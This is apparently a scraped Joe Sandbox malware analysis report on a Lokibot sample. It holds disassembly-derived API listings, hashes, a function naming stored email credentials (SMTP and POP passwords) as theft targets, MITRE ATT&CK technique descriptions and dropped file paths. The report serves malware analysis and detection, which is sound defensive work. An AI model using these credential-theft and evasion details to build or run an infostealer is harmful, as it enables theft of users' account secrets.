Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

PopServer, xrefs: 0040D099
EmailAddress, xrefs: 0040D074
SmtpAccount, xrefs: 0040D0FA
SmtpPassword, xrefs: 0040D117
Technology, xrefs: 0040D08D
SmtpPort, xrefs: 0040D0EB
SmtpServer, xrefs: 0040D0DC
PopPort, xrefs: 0040D0A7
PopAccount, xrefs: 0040D0B6
PopPassword, xrefs: 0040D0D0

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asw2dfr5.xlk.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoh2izgh.riv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfj5fqtq.f4y.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yogodoji.ewd.psm1

